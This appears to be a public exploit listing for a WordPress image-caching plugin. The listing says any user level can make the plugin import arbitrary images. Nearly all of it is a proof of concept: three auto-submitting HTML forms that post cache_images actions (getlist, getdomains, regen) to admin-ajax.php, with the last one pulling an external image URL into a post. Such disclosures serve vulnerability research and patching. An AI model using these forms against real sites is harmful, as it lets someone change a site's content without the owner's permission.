Share
## https://sploitus.com/exploit?id=WPEX-ID:03E7C2DC-1C6D-4CFF-AF59-6B41EAD74978
Allows import of any images with any user level.
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="cache_images">
<input type="text" name="do" value="getlist">
<input type="text" name="domain" value="example.com">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="cache_images">
<input type="text" name="do" value="getdomains">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="cache_images">
<input type="text" name="do" value="regen">
<input type="text" name="url" value="https://heise.cloudimg.io/v7/_www-heise-de_/imgs/18/3/4/8/4/2/6/8/shutterstock_1124819546_jpg.jpg-d3889c815ce30778.jpeg?org_if_sml=1&q=30&width=1032">
<input type="text" name="postid" value="2">
</form>
<script>
document.getElementById("test").submit();
</script>